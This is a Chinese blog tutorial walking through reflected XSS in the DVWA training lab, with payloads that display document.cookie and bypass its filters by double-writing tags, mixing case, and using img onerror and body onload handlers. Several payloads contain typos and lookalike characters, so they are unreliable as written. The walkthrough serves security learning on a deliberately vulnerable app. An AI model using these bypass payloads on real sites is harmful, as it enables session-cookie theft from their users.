【DVWA-master】反射型xss(每一步都很详细)

已于 2024-10-02 22:10:46 修改
阅读量385 收藏 8
点赞数 9
文章标签: xss mysql 数据库 sql database
于 2024-10-02 22:09:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mw18211406853/article/details/142681918
版权

xss(跨站脚本攻击)是一种常见的Web应用程序安全漏洞‌,它允许攻击者在网页中嵌入恶意脚本代码,通常是JavaScript,当用户浏览这些网页时,嵌入的代码会在用户的浏览器上执行,从而达到攻击者的目的‌.

一,反射型xss(初级)

在DVWA-master里面点击xss(reflect)

1.执行<script>alert(/xss/)</script>会出现弹框,有xss漏洞

2.查看当前的cookie

<script>alert(document.cookie)</script>

二,反射型xss(中级)

切换到安全级别中级,查看源代码,会发现会直接过滤掉<script>,所以要想办法绕过它,可以用双写绕过或者是大小写混淆绕过

1.双写绕过

(1)<sc<script>ript>alert(/xss/)</script>   执行出现谈话框

(2)获取当前页面cookie

<sc<script>ript>alert(document.cookie)</script>

2.大小写混淆绕过

(1)<ScriPt>alert(/xss/)</script>

(2)获取当前页面cookie

<ScriPt>alert(document.cookie)</script>

,反射型xss(高级)

查看源程序发现对<script>进行了替换,不能用常规的方法绕过它,可以用其他语句如img标签和body标签

1.使用标签img

(1)<img scr=1 οnerrοr=alter(/xss/)>  

(2)查看当前的cookie

<img src=1 οnerrοr=alert(document.cookie)>

2.用body标签

(1)<body οnlοad=alert(/xss/)>

(2)查看当前的cookie

<body οnlοad=alert(document.cookie)>

中高级主要是想办法去绕过

晨曦wx
关注
DVWA靶场教程
wxh的博客
01-15 2万+
Burt Force(暴力破解)
XSS跨站脚本攻击
SYJ_361的博客
12-23 4199
本文介绍了XXS跨站脚本攻击的几种方法。其中包括对反射XSS、存储XSS和DOMXSS的攻击,以及我们在kali中用到了beef和Setoolkit对目标进行信息获取。
DVWA全关教程手册
热门推荐
黑白的博客
11-15 2万+
搭建 使用phpstudy 放入根目录下 C:\phpstudy\PHPTutorial\WWW 修改两个配置文件 C:\phpstudy\PHPTutorial\WWW\DVWA\php.ini magic_quotes_gpc = Off alLow_url_fopen = on alLow_url_include = on C:\phpstudy\PHPTutorial\WWW\DVWA\config\config.inc.php 本来应该是个备份,改吧改吧后缀 拷贝进去 $_DVWA[ ‘db_
XSS总结
weixin_43263451的博客
08-03 786
XSS总结简介跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 分类反射XSS反射只是简单的将用户输入的数据”反射”给浏览器,...
渗透实验三#XSS#SQL
qq_49078152的博客
12-03 471
实验三 XSSSQL注入 说明:套用实验报告模板,红色部分无需复制到报告。 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验
[红日安全]Web安全Day2 - XSS跨站实战攻防
hongrisec的博客
02-20 946
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫Web安全实战,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pytho...
实验三 XSSSQL注入
m0_52077544的博客
12-26 362
XSSSQL注入实验目的及环境实验原理 实验目的及环境 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验原理 XSS 1、什么
爆破,命令执行与dvwa靶场
ing_end的博客
02-11 3796
爆破 web21 题目:爆破什么的,都是基操 我们尝试抓包 我们发现用户名和密码被加密,用burp自带解码工具解码 发现用户名和密码中间用冒号隔开 爆破成功 web22 题目:域名也可以爆破的,试试爆破这个ctf.show的子域名 页面失效,提交flag{ctf_show_web} web23 题目:还爆破?这么多代码,告辞! <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:4
阿里云+LAMP+DVWA
weixin_30278311的博客
06-22 311
  DVWA是一个不错的安全漏洞学习和测试环境,能够提供Brute Force(暴力破解)、Comman Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA(不安全的验证码)、SQL Injection(SQL注入)、XSS(Reflected)(反射性跨站脚本)、XSS(St...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master安装包
02-28
2. **跨站脚本(XSS)**:分为反射和存储两种,XSS允许攻击者通过注入可执行的JavaScript代码来窃取用户cookie或其他敏感信息。 3. **跨站请求伪造(CSRF)**:攻击者诱导用户执行非预期的操作,比如更改密码或...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
Pikachu-Cross-Site Scripting-xss盲打
guanrongl的专栏
10-03 208
xss盲打,不是一种漏洞类,而是一个攻击场景;在前端、或者在当前页面是看不到攻击结果;而是在后端、在别的页面才看到结果。登陆后台,查看结果;
PIKACHU | PIKACHU 靶场 XSS 后台配置
Blue17 の 小窝
09-30 811
PIKACHU 自带了一个 XSS 平台,可以辅助我们完成 XSS 攻击,但是该后台需要配置数据库以后才能使用。本教程,就是教大家如何配置 PIKACHU XSS 平台的。PIKACHU XSS 平台的配置流程主要分为以下三步:修改 PIKACHU 数据库配置文件。=> 修改过的可以跳过此步初始化 PIKACHU XSS 平台数据库。登录并使用 PIKACHU XSS 平台。
XSS(内含DVWA
m0_73902453的博客
09-27 843
反射 XSS:即时反射,依赖用户点击链接,通常是一次性的。存储 XSS:恶意代码存储在服务器上,多次执行,影响广泛。DOM XSS:常在客户端,通过操控 DOM 元素来执行,无需与服务器交互。
Pikachu-xss防范措施 - href输出 & js输出
最新发布
guanrongl的专栏
10-03 318
要想防止href 标签的xss : 一、可以做输入限定,只允许http 、https 的头的输入;二、结合输入限定后再做特殊字符转义。转义:所有输出到前端的数据,都根据输出点进行转义,比如输出到html中进行html实体转义,输入到 JS 里面的进行 JS 转义。过滤:根据业务需要进行过滤,如:输入点要求输入手机号,则只允许输入手机号格式的数字;从页面代码上看出,这是个href 标签,并且做了href特殊字符转换。核心点是:$ms == 'tmac'总体原则: 输入做过滤,输出做转义。
Pikachu-Cross-Site Scripting-反射xss(get)
guanrongl的专栏
10-02 481
存储XSS是指恶意脚本被存储在目标服务器上,当用户访问包含该脚本的页面时,脚本会被执行。例如,攻击者可以在留言板中输入恶意脚本,当其他用户查看留言时,脚本会在他们的浏览器中执行。这种类XSS不需要服务器端的参与,攻击者通过构造特定的URL或操作DOM,使得浏览器执行恶意脚本。提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;2、输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;先输入各种特殊字符,查看源代码,查看页面返回;
Pikachu-Cross-Site Scripting-xss之htmlspecialchars
guanrongl的专栏
10-03 170
查看页面元素,可以看到这里对一些符号做了转换,但是 单引号等几个符号没处理;提交,得到xss攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值